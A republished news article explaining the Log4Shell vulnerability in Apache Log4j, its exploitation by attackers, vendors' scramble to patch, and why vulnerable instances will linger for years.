HomeTechnologyThe Log4J Vulnerability Will Haunt the Internet for Years

The Log4J Vulnerability Will Haunt the Internet for Years


master mentalism tricks

A vulnerability in the open source Apache logging library Log4j sent system administrators and security professionals scrambling over the weekend. Known as Log4Shell, the flaw is exposing some of the world’s most popular applications and services to attack, and the outlook hasn’t improved since the vulnerability came to light on Thursday. If anything, it’s now excruciatingly clear that Log4Shell will continue to wreak havoc across the internet for years to come.

Hackers have been exploiting the bug since the beginning of the month, according to researchers from Cisco and Cloudflare. But attacks ramped up dramatically following Apache’s disclosure on Thursday. So far, attackers have exploited the flaw to install cryptominers on vulnerable systems, steal system credentials, burrow deeper within compromised networks, and steal data, according to a recent report from Microsoft

The range of impacts is so broad because of the nature of the vulnerability itself. Developers use logging frameworks to keep track of what happens in a given application. To exploit Log4Shell, an attacker only needs to get the system to log a strategically crafted string of code. From there they can load arbitrary code on the targeted server and install malware or launch other attacks. Notably, hackers can introduce the snippet in seemingly benign ways, like by sending the string in an email or setting it as an account username.

Major tech players, including Amazon Web Services, Microsoft, Cisco, Google Cloud, and IBM have all found that at least some of their services were vulnerable and have been rushing to issue fixes and advise customers about how best to proceed. The exact extent of the exposure is still coming into view, though. Less fastidious organizations or smaller developers who may lack resources and awareness will be slower to confront the Log4Shell threat. 

“What is almost certain is that for years people will be discovering the long tail of new vulnerable software as they think of new places to put exploit strings,” says independent security researcher Chris Frohoff. “This will probably be showing up in assessments and penetration tests of custom enterprise apps for a long time.”

The vulnerability is already being used by a “growing set of threat actors,” US Cybersecurity and Infrastructure Security Agency director Jen Easterly said in a statement on Saturday. She added that the flaw is “one of the most serious I’ve seen in my entire career, if not the most serious” in a call with critical infrastructure operators on Monday, as first reported by CyberScoop. In that same call, a CISA official estimated that hundreds of millions of devices are likely affected.

The hard part will be tracking all of those down. Many organizations don’t have a clear accounting of every program they use and the software components within each of those systems. The UK’s National Cyber Security Centre emphasized on Monday that enterprises need to “discover unknown instances of Log4j” in addition to patching the usual suspects. By its nature, open source software can be incorporated wherever developers want, meaning that when a major vulnerability crops up, exposed code can lurk around every corner. Even before Log4Shell, software supply chain security advocates had increasingly pushed for “software bills of materials,” or SBOMs, to make it easier to take stock and keep up with security protections.

Read The Full Article Here


trick photography
Advertisingfutmillion

Popular posts

Overlord Season 4 Episode 13 Release Date & Time
Demon Slayer Entertainment District Arc Blu-ray Release Date Set
Silent Land review – Chillingly exposes class entitlement
Elon Musk Slams Amazon’s ‘Lord of the Rings’ Series
Elite Season 6 Release Date Confirmed: Is Samuel Really Dead?
9-1-1 Exclusive Clip: A Tunnel of Secrets
The Last of Us: HBO Unveils Trailer for Highly Anticipated
Evan Peters Is the Infamous Twisted Serial Killer in First
Fans Choose Sam Smith’s ‘Unholy’ Featuring Kim Petras as This
Glass Onion: A Knives Out Mystery Is a Silly, Absurd
BLACKPINK’s ‘Born Pink’ Debuts at No
Rihanna Posts NFL Football Pic, Confirming She’s the Next Super
These Lip Stains Will Never, Ever Budge
7 Autumn Trends Marks and Spencer Is Already Backing in
I Have Expensive Taste But a Small Budget—7 Trends I’m
I Tried It: Huawei’s Latest Stylish Smartwatch
Interview with Louise Jane Watson, Author of Marooned
The Joys of a Natural Disaster in Powerful Memoir Placing
Interview with Ross Hightower, Author of Spirit Sight
9 Luscious Literary Books Like Transcendent Kingdom
Did druids build Stonehenge?
Watch NASA’s DART spacecraft hit ‘bullseye’ by smashing into an
Teens become more exploratory with age
Best foam rollers 2022 for effective warm-ups, cool-downs and recovery
Colette Pichon Battle’s Plea for Climate Justice From the US
Meta permanently bans Pornhub’s Instagram account for “repeatedly violating” its
The Future of Climate Activism Is Intergenerational—and on TikTok
Google, Vodafone Partner to Extend Wear OS Smartwatch Battery Life